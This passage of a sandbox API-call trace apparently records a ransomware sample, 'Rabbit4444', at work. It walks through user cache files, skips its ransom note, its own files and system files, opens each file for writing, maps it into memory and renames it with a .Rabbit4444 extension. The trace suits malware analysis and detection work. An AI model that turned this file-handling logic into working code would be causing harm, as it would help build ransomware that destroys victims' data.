hHeap=0xe0000) returned 1 [0069.329] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1095a0 | out: hHeap=0xe0000) returned 1 [0069.329] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=16064024775) returned 1 [0069.330] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1176f8 | out: hHeap=0xe0000) returned 1 [0069.330] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101af0 | out: hHeap=0xe0000) returned 1 [0069.330] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0069.330] CloseHandle (hObject=0x29c) returned 1 [0069.330] CloseHandle (hObject=0x280) returned 1 [0069.330] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\IE77EECT\\4\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_12[1].txt.Rabbit4444") returned 198 [0069.330] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\IE77EECT\\4\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_12[1].txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\ac\\appcache\\ie77eect\\4\\c__windows_systemapps_microsoft.windows.cortana_cw5n1h2txyewy_cache_desktop_12[1].txt"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\IE77EECT\\4\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_12[1].txt.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\ac\\appcache\\ie77eect\\4\\c__windows_systemapps_microsoft.windows.cortana_cw5n1h2txyewy_cache_desktop_12[1].txt.rabbit4444"), dwFlags=0x1) returned 1 [0069.331] FindNextFileW (in: hFindFile=0x102a50, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xf8ff405a, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0xf8ff405a, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0xd067ccf2, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0xa0ef, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_13[1].txt", cAlternateFileName="C_F04C~1.TXT")) returned 1 [0069.331] lstrcmpiW (lpString1="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_13[1].txt", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0069.331] lstrcmpiW (lpString1="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_13[1].txt", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0069.331] lstrcmpiW (lpString1="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_13[1].txt", lpString2="Rabbit4444.exe") returned -1 [0069.331] lstrcmpiW (lpString1="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_13[1].txt", lpString2=".") returned 1 [0069.331] lstrcmpiW (lpString1="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_13[1].txt", lpString2="..") returned 1 [0069.331] lstrcmpiW (lpString1="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_13[1].txt", lpString2="windows") returned -1 [0069.331] lstrcmpiW (lpString1="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_13[1].txt", lpString2="bootmgr") returned 1 [0069.331] lstrcmpiW (lpString1="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_13[1].txt", lpString2="pagefile.sys") returned -1 [0069.331] lstrcmpiW (lpString1="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_13[1].txt", lpString2="boot") returned 1 [0069.331] lstrcmpiW (lpString1="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_13[1].txt", lpString2="ids.txt") returned -1 [0069.331] lstrcmpiW (lpString1="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_13[1].txt", lpString2="NTUSER.DAT") returned -1 [0069.331] lstrcpyW (in: lpString1=0x130ec04, lpString2="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_13[1].txt" | out: lpString1="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_13[1].txt") returned="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_13[1].txt" [0069.331] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\IE77EECT\\4\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_13[1].txt", dwFileAttributes=0x2000) returned 1 [0069.332] lstrlenW (lpString="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_13[1].txt") returned 85 [0069.332] lstrlenW (lpString="Rabbit4444") returned 10 [0069.332] lstrcmpiW (lpString1="_13[1].txt", lpString2="Rabbit4444") returned -1 [0069.332] lstrlenW (lpString=".dll") returned 4 [0069.332] lstrcmpiW (lpString1=".txt", lpString2=".dll") returned 1 [0069.332] lstrlenW (lpString=".lnk") returned 4 [0069.332] lstrcmpiW (lpString1=".txt", lpString2=".lnk") returned 1 [0069.332] lstrlenW (lpString=".ini") returned 4 [0069.332] lstrcmpiW (lpString1=".txt", lpString2=".ini") returned 1 [0069.332] lstrlenW (lpString=".sys") returned 4 [0069.332] lstrcmpiW (lpString1=".txt", lpString2=".sys") returned 1 [0069.332] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\IE77EECT\\4\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_13[1].txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\ac\\appcache\\ie77eect\\4\\c__windows_systemapps_microsoft.windows.cortana_cw5n1h2txyewy_cache_desktop_13[1].txt"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x280 [0069.332] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0069.332] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=16064325521) returned 1 [0069.333] GetFileSizeEx (in: hFile=0x280, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=41199) returned 1 [0069.333] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117a40 [0069.333] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101848 [0069.333] CreateFileMappingW (hFile=0x280, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xa3f0, lpName=0x0) returned 0x29c [0069.334] MapViewOfFile (hFileMappingObject=0x29c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xa3f0) returned 0x70000 [0069.336] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x105020 [0069.336] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1097d0 [0069.336] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105020 | out: hHeap=0xe0000) returned 1 [0069.336] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109140 [0069.336] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x11e1e8 [0069.337] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109140 | out: hHeap=0xe0000) returned 1 [0069.337] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11e1e8 | out: hHeap=0xe0000) returned 1 [0069.337] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1097d0 | out: hHeap=0xe0000) returned 1 [0069.337] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=16064763663) returned 1 [0069.337] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117a40 | out: hHeap=0xe0000) returned 1 [0069.337] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101848 | out: hHeap=0xe0000) returned 1 [0069.337] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0069.337] CloseHandle (hObject=0x29c) returned 1 [0069.338] CloseHandle (hObject=0x280) returned 1 [0069.338] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\IE77EECT\\4\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_13[1].txt.Rabbit4444") returned 198 [0069.338] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\IE77EECT\\4\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_13[1].txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\ac\\appcache\\ie77eect\\4\\c__windows_systemapps_microsoft.windows.cortana_cw5n1h2txyewy_cache_desktop_13[1].txt"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\IE77EECT\\4\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_13[1].txt.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\ac\\appcache\\ie77eect\\4\\c__windows_systemapps_microsoft.windows.cortana_cw5n1h2txyewy_cache_desktop_13[1].txt.rabbit4444"), dwFlags=0x1) returned 1 [0069.341] FindNextFileW (in: hFindFile=0x102a50, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xf9066771, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0xf9066771, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0xd06a2f50, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x78cb4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_14[1].txt", cAlternateFileName="C_988E~1.TXT")) returned 1 [0069.341] lstrcmpiW (lpString1="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_14[1].txt", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0069.341] lstrcmpiW (lpString1="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_14[1].txt", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0069.341] lstrcmpiW (lpString1="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_14[1].txt", lpString2="Rabbit4444.exe") returned -1 [0069.341] lstrcmpiW (lpString1="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_14[1].txt", lpString2=".") returned 1 [0069.341] lstrcmpiW (lpString1="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_14[1].txt", lpString2="..") returned 1 [0069.341] lstrcmpiW (lpString1="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_14[1].txt", lpString2="windows") returned -1 [0069.341] lstrcmpiW (lpString1="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_14[1].txt", lpString2="bootmgr") returned 1 [0069.341] lstrcmpiW (lpString1="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_14[1].txt", lpString2="pagefile.sys") returned -1 [0069.342] lstrcmpiW (lpString1="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_14[1].txt", lpString2="boot") returned 1 [0069.342] lstrcmpiW (lpString1="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_14[1].txt", lpString2="ids.txt") returned -1 [0069.342] lstrcmpiW (lpString1="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_14[1].txt", lpString2="NTUSER.DAT") returned -1 [0069.342] lstrcpyW (in: lpString1=0x130ec04, lpString2="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_14[1].txt" | out: lpString1="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_14[1].txt") returned="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_14[1].txt" [0069.342] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\IE77EECT\\4\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_14[1].txt", dwFileAttributes=0x2000) returned 1 [0069.342] lstrlenW (lpString="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_14[1].txt") returned 85 [0069.342] lstrlenW (lpString="Rabbit4444") returned 10 [0069.342] lstrcmpiW (lpString1="_14[1].txt", lpString2="Rabbit4444") returned -1 [0069.342] lstrlenW (lpString=".dll") returned 4 [0069.342] lstrcmpiW (lpString1=".txt", lpString2=".dll") returned 1 [0069.342] lstrlenW (lpString=".lnk") returned 4 [0069.342] lstrcmpiW (lpString1=".txt", lpString2=".lnk") returned 1 [0069.342] lstrlenW (lpString=".ini") returned 4 [0069.342] lstrcmpiW (lpString1=".txt", lpString2=".ini") returned 1 [0069.342] lstrlenW (lpString=".sys") returned 4 [0069.342] lstrcmpiW (lpString1=".txt", lpString2=".sys") returned 1 [0069.342] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\IE77EECT\\4\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_14[1].txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\ac\\appcache\\ie77eect\\4\\c__windows_systemapps_microsoft.windows.cortana_cw5n1h2txyewy_cache_desktop_14[1].txt"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x280 [0069.343] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0069.343] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=16065346902) returned 1 [0069.343] GetFileSizeEx (in: hFile=0x280, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=494772) returned 1 [0069.343] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117ab8 [0069.343] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101380 [0069.343] CreateFileMappingW (hFile=0x280, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x78fc0, lpName=0x0) returned 0x29c [0069.344] MapViewOfFile (hFileMappingObject=0x29c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x78fc0) returned 0x2b0000 [0069.512] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x105020 [0069.512] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ab0 [0069.512] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105020 | out: hHeap=0xe0000) returned 1 [0069.512] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109370 [0069.512] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x11e1e8 [0069.512] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109370 | out: hHeap=0xe0000) returned 1 [0069.513] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11e1e8 | out: hHeap=0xe0000) returned 1 [0069.513] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ab0 | out: hHeap=0xe0000) returned 1 [0069.513] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=16082335732) returned 1 [0069.513] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117ab8 | out: hHeap=0xe0000) returned 1 [0069.513] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101380 | out: hHeap=0xe0000) returned 1 [0069.513] UnmapViewOfFile (lpBaseAddress=0x2b0000) returned 1 [0069.517] CloseHandle (hObject=0x29c) returned 1 [0069.517] CloseHandle (hObject=0x280) returned 1 [0069.517] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\IE77EECT\\4\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_14[1].txt.Rabbit4444") returned 198 [0069.517] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\IE77EECT\\4\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_14[1].txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\ac\\appcache\\ie77eect\\4\\c__windows_systemapps_microsoft.windows.cortana_cw5n1h2txyewy_cache_desktop_14[1].txt"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\IE77EECT\\4\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_14[1].txt.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\ac\\appcache\\ie77eect\\4\\c__windows_systemapps_microsoft.windows.cortana_cw5n1h2txyewy_cache_desktop_14[1].txt.rabbit4444"), dwFlags=0x1) returned 1 [0069.519] FindNextFileW (in: hFindFile=0x102a50, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xf908c9c9, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0xf908c9c9, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0xd06a2f50, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x1c44e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_15[1].txt", cAlternateFileName="C_82F5~1.TXT")) returned 1 [0069.519] lstrcmpiW (lpString1="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_15[1].txt", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0069.519] lstrcmpiW (lpString1="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_15[1].txt", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0069.519] lstrcmpiW (lpString1="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_15[1].txt", lpString2="Rabbit4444.exe") returned -1 [0069.519] lstrcmpiW (lpString1="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_15[1].txt", lpString2=".") returned 1 [0069.519] lstrcmpiW (lpString1="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_15[1].txt", lpString2="..") returned 1 [0069.519] lstrcmpiW (lpString1="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_15[1].txt", lpString2="windows") returned -1 [0069.519] lstrcmpiW (lpString1="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_15[1].txt", lpString2="bootmgr") returned 1 [0069.519] lstrcmpiW (lpString1="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_15[1].txt", lpString2="pagefile.sys") returned -1 [0069.519] lstrcmpiW (lpString1="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_15[1].txt", lpString2="boot") returned 1 [0069.519] lstrcmpiW (lpString1="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_15[1].txt", lpString2="ids.txt") returned -1 [0069.519] lstrcmpiW (lpString1="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_15[1].txt", lpString2="NTUSER.DAT") returned -1 [0069.519] lstrcpyW (in: lpString1=0x130ec04, lpString2="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_15[1].txt" | out: lpString1="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_15[1].txt") returned="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_15[1].txt" [0069.519] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\IE77EECT\\4\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_15[1].txt", dwFileAttributes=0x2000) returned 1 [0069.519] lstrlenW (lpString="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_15[1].txt") returned 85 [0069.519] lstrlenW (lpString="Rabbit4444") returned 10 [0069.520] lstrcmpiW (lpString1="_15[1].txt", lpString2="Rabbit4444") returned -1 [0069.520] lstrlenW (lpString=".dll") returned 4 [0069.520] lstrcmpiW (lpString1=".txt", lpString2=".dll") returned 1 [0069.520] lstrlenW (lpString=".lnk") returned 4 [0069.520] lstrcmpiW (lpString1=".txt", lpString2=".lnk") returned 1 [0069.520] lstrlenW (lpString=".ini") returned 4 [0069.520] lstrcmpiW (lpString1=".txt", lpString2=".ini") returned 1 [0069.520] lstrlenW (lpString=".sys") returned 4 [0069.520] lstrcmpiW (lpString1=".txt", lpString2=".sys") returned 1 [0069.520] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\IE77EECT\\4\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_15[1].txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\ac\\appcache\\ie77eect\\4\\c__windows_systemapps_microsoft.windows.cortana_cw5n1h2txyewy_cache_desktop_15[1].txt"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x280 [0069.520] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0069.520] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=16083127072) returned 1 [0069.521] GetFileSizeEx (in: hFile=0x280, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=115790) returned 1 [0069.521] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117ba8 [0069.521] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x102040 [0069.521] CreateFileMappingW (hFile=0x280, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x1c750, lpName=0x0) returned 0x29c [0069.522] MapViewOfFile (hFileMappingObject=0x29c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x1c750) returned 0x70000 [0069.528] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x105020 [0069.528] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ce0 [0069.528] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105020 | out: hHeap=0xe0000) returned 1 [0069.528] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ab0 [0069.528] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x11e1e8 [0069.528] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ab0 | out: hHeap=0xe0000) returned 1 [0069.528] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11e1e8 | out: hHeap=0xe0000) returned 1 [0069.528] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ce0 | out: hHeap=0xe0000) returned 1 [0069.528] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=16083901597) returned 1 [0069.528] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117ba8 | out: hHeap=0xe0000) returned 1 [0069.528] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x102040 | out: hHeap=0xe0000) returned 1 [0069.528] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0069.529] CloseHandle (hObject=0x29c) returned 1 [0069.530] CloseHandle (hObject=0x280) returned 1 [0069.530] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\IE77EECT\\4\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_15[1].txt.Rabbit4444") returned 198 [0069.530] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\IE77EECT\\4\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_15[1].txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\ac\\appcache\\ie77eect\\4\\c__windows_systemapps_microsoft.windows.cortana_cw5n1h2txyewy_cache_desktop_15[1].txt"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\IE77EECT\\4\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_15[1].txt.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\ac\\appcache\\ie77eect\\4\\c__windows_systemapps_microsoft.windows.cortana_cw5n1h2txyewy_cache_desktop_15[1].txt.rabbit4444"), dwFlags=0x1) returned 1 [0069.530] FindNextFileW (in: hFindFile=0x102a50, lpFindFileData=0x130dfe8 | out: 